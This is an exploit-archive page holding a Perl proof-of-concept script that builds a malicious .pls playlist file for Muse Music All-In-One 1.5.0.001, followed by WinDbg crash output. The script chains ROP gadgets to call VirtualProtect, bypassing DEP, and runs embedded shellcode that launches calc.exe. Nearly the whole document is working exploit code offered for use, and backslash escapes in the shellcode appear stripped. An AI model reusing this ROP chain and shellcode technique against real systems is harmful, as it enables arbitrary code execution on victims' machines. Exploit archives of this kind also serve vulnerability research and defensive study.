Home / exploitsPDF  

Muse Music All-In-One PLS Buffer Overflow

Posted on 27 September 2011

#!/usr/bin/perl
#
#[+]Exploit Title: Muse Music All-In-One PLS File Buffer Overflow Exploit(DEP Bypass)
#[+]Date: 2592011(DDMMYYYY)
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Muse-Music-All-In-One/3000-2141_4-10070288.html
#[+]Version: 1.5.0.001
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#[+]Info:
#This exploit can be universal, if the buffer to overwrite EIP stay for all Windows systems equal. ;)
#To reproduce click in File -> Open... -> Select Exploit.pls and see the Calc.
#

use strict;
use warnings;

print q{

Created By C4SS!0 G0M3S
E-mail netfuzzer@hotmail.com
Blog net-fuzzer.blogspot.com
};
print "
		[+]Creating Exploit File...
";
sleep(2);

##########################ROP START HERE###############################################
my $rop = pack('V',0x0043bc93); # POP EAX # RETN
$rop .= "AAAA" x 4; # JUNK
$rop .= pack('V',0x00339014); # PTR to a Call DWORD for LoadLibraryA
$rop .= pack('V',0x1002042f); # POP EBP # RETN
$rop .= pack('V',0x0044387e); # ADD ESP,40 # RETN == Return of LoadLibraryA
$rop .= pack('V',0x100255d1); # POP ESI # RETN
$rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == LoadLibraryA
$rop .= pack('V',0x004a296b); # POP EDI # RETN
$rop .= pack('V',0x004a296c); # RETN
$rop .= pack('V',0x004b0519); # PUSHAD # RETN
$rop .= "kernel32.dllx00";
$rop .= "A" x 35; # JUNK
#############################Call GetProcAddress###################################
$rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN
$rop .= pack('V',0x004a296b); # POP EDI # RETN
$rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress
$rop .= pack('V',0x100255d1); # POP ESI # RETN
$rop .= pack('V',0x0044387e); # ADD ESP,40 # RETN == Return of GetProcAddress
$rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN
$rop .= pack('V',0x004b9563); # XCHG EAX,EBP # RETN
$rop .= pack('V',0x0043bc93); # POP EAX # RETN
$rop .= pack('V',0x00339010); # PTR to GetProcAddress
$rop .= pack('V',0x004a296b); # POP EDI # RETN
$rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress
$rop .= pack('V',0x004b0519); # PUSHAD # RETN
$rop .= "VirtualProtectx00";
$rop .= "A" x 33; # JUNK
#############################Call VirtualProtect####################################
$rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN
$rop .= pack('V',0x00432a42); # PUSH ESP # POP EDI # XOR EAX,EAX # POP ESI # RETN 08
$rop .= "VVVV"; # JUNK
$rop .= pack('V',0x004a296c) x 3; # RETN
$rop .= pack('V',0x10018000); # XOR EAX,EAX # RETN
$rop .= pack('V',0x0043bc93); # POP EAX # RETN
$rop .= pack('V',0x00000040); # Value of flNewProtect
$rop .= pack('V',0x00478695); # XCHG EAX,EDX # RETN
$rop .= pack('V',0x10018000); # XOR EAX,EAX # RETN
$rop .= pack('V',0x1001433f); # ADD EAX,EDI # POP EDI # POP ESI # RETN
$rop .= "A" x 8; # JUNK
$rop .= pack('V',0x1002028b); # POP ECX # RETN
$rop .= "x00x00x00x00";
$rop .= pack('V',0x1000B6ED); # ADD ECX,EAX # MOV DWORD PTR DS:[10085B38],ECX # RETN
$rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN
$rop .= pack('V',0x1002042f); # POP EBP # RETN
$rop .= pack('V',0x10012107); # PUSH ESP # RETN == Return of VirtualProtect
$rop .= pack('V',0x004a05b8); # POP EBX # RETN
$rop .= pack('V',0x00000500); # Value of dwSize
$rop .= pack('V',0x004b2c56); # XCHG EAX,ESI # RETN
$rop .= pack('V',0x004a296b); # POP EDI # RETN
$rop .= pack('V',0x004a296c); # RETN
$rop .= pack('V',0x004b0519); # PUSHAD # RETN
##########################ROP END HERE#################################################
my $shellcode =
"xb8x4bxafx2dx0exdaxdexd9x74x24xf4x5bx29xc9" .
"xb1x32x83xebxfcx31x43x0ex03x08xa1xcfxfbx72" .
"x55x86x04x8axa6xf9x8dx6fx97x2bxe9xe4x8axfb" .
"x79xa8x26x77x2fx58xbcxf5xf8x6fx75xb3xdex5e" .
"x86x75xdfx0cx44x17xa3x4ex99xf7x9ax81xecxf6" .
"xdbxffx1fxaaxb4x74x8dx5bxb0xc8x0ex5dx16x47" .
"x2ex25x13x97xdbx9fx1axc7x74xabx55xffxffxf3" .
"x45xfex2cxe0xbax49x58xd3x49x48x88x2dxb1x7b" . # Shellcode Winexec "Calc.exe"
"xf4xe2x8cxb4xf9xfbxc9x72xe2x89x21x81x9fx89" . # Bad chars "x00x20x3dx0ax0dxff"
"xf1xf8x7bx1fxe4x5ax0fx87xccx5bxdcx5ex86x57" .
"xa9x15xc0x7bx2cxf9x7ax87xa5xfcxacx0exfdxda" .
"x68x4bxa5x43x28x31x08x7bx2ax9dxf5xd9x20x0f" .
"xe1x58x6bx45xf4xe9x11x20xf6xf1x19x02x9fxc0" .
"x92xcdxd8xdcx70xaax17x97xd9x9axbfx7ex88x9f" .
"xddx80x66xe3xdbx02x83x9bx1fx1axe6x9ex64x9c" .
"x1axd2xf5x49x1dx41xf5x5bx7ex04x65x07x81";
my $buf = "A" x 1300;
$buf .= $rop;
$buf .= "x90" x 10;
$buf .= $shellcode;
$buf .= "A" x 2000;

open(my $file,">Exploit.pls") or die "[-]Error: $!
";
print $file $buf;
close $file;
print "		[+]File Exploit.pls Created Successfully.
";
sleep(1);
=head
(8f4.8f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=0000007b ecx=ffffffff edx=00000002 esi=00130000 edi=77c3fce0
eip=77c24609 esp=0012ea1c ebp=0012ec34 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:WINDOWSsystem32msvcrt.dll -
msvcrt!wscanf+0x2343:
77c24609 8806            mov     byte ptr [esi],al          ds:0023:00130000=41
0:000> .exr -1
ExceptionAddress: 77c24609 (msvcrt!wscanf+0x00002343)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 00130000
Attempt to write to address 00130000
0:000> .lastevent
Last event: 8f4.8f8: Access violation - code c0000005 (first chance)
debugger time: Sun Sep 25 19:22:13.937 2011 (UTC - 3:00)
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ec34 77c212df msvcrt!wscanf+0x2343
*** WARNING: Unable to verify checksum for Muse.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Muse.exe -
0012ec70 00498d3a msvcrt!fscanf+0x28
0012eca4 7c91a3cb Muse!CSdll::operator=+0x974fa
0012ecb8 7c91a351 ntdll!RtlpUnWaitCriticalSection+0x86c
00000000 00000000 ntdll!RtlpUnWaitCriticalSection+0x7f2
0:000> g
(8f4.8f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012e64c ebp=0012e66c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???
0:000> !load winext/msec.dll
0:000> !exploitable -v
HostMachineHostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x41414141
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Exception Hash (Major/Minor): 0x71174239.0x2a6b1069

Stack Trace:
Unknown
ntdll!RtlConvertUlongToLargeInteger+0x6a
ntdll!RtlConvertUlongToLargeInteger+0x3c
ntdll!KiUserExceptionDispatcher+0xe
msvcrt!fscanf+0x28
Muse!CSdll::operator=+0x974fa
ntdll!RtlpUnWaitCriticalSection+0x86c
ntdll!RtlpUnWaitCriticalSection+0x7f2
Instruction Address: 0x0000000041414141

Description: Read Access Violation at the Instruction Pointer
Short Description: ReadAVonIP
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from ntdll!RtlConvertUlongToLargeInteger+0x000000000000006a (Hash=0x71174239.0x2a6b1069)

Access violations at the instruction pointer are exploitable if not near NULL.

=cut

 

TOP

Malware :

Exploits :